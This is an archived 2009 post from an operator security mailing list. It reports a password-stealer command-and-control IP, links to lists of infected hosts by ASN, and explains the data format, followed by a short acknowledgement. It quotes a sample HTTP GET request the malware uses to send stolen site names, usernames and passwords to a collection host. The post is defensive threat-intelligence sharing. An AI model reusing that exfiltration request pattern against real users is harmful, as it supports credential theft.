[nsp-sec] ACK 2119, 8786, 8434. 130K+ Infected Ips on ~3600 ASNs

bjorn.jensen at telenor.com bjorn.jensen at telenor.com
Thu Oct 1 15:51:55 EDT 2009 

ACK for 2119, 8434, 8786

Thank you for sharing information.


/Bjorn
________________________________________
Fra: nsp-security-bounces at puck.nether.net [nsp-security-bounces at puck.nether.net] på vegne av Stephen Gill [gillsr at cymru.com]
Sendt: 1. oktober 2009 19:47
Til: NSP-SEC List
Emne: [nsp-sec] 130K+ Infected Ips on ~3600 ASNs

----------- nsp-security Confidential --------

Hi Team,

This password stealer head end IP appears to be quite busy:

76.73.37.250

We're working w/ the ISP on takedown, however in the meantime here is a list
of 130K+ infected Ips seen talking to it primarily via TCP 80 (reporting
stolen credentials) and UDP 7006 - UDP 7012.  I don't anticipate an IP
takedown to last forver because they can likely re-route via DNS.

    ASN list:
    https://www.cymru.com/nsp-sec/Owned/stealer/asns.txt

    Infected IP list:
    https://www.cymru.com/nsp-sec/Owned/stealer/
    eg https://www.cymru.com/nsp-sec/Owned/stealer/as3.txt

Timestamps in UTC.

Some clarification on the formatting:

3       | 18.26.4.9        | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS -
Massachusetts Institute of Technology

The timestamp column will begin with a U or a T.  U is for UDP, T for TCP.
When possible we've preferred to list out a T if we have seen any TCP 80
traffic from the client IP in question.

It looks like the malware on the client may choose its source IP address
since we noticed some RFC 1918 traffic so it is possible the UDP data will
not match in all cases.  I cannot guarantee that the UDP traffic is not part
of some type of actual software but it sure looks suspicious.  Here is a
public URL for reference:

    http://www.prevx.com/filenames/1240768162315901-X1/CDSETUP.EXE.html

As there is UDP involved we cannot guarantee that there are 0 spoofed Ips,
but on the TCP side that is another matter.

HTTP credential stealing looks something like this:

GET
/pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USERNAME&
p=STOLEN_PASSWORD HTTP/1.1
User-Agent: Mozilla/4.0 (compatible).
Host: hotshows.org.
.


Cheers,
-- steve

--
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com




_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security

Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
community. Confidentiality is essential for effective Internet security counter-measures.
_______________________________________________

More information about the nsp-security mailing list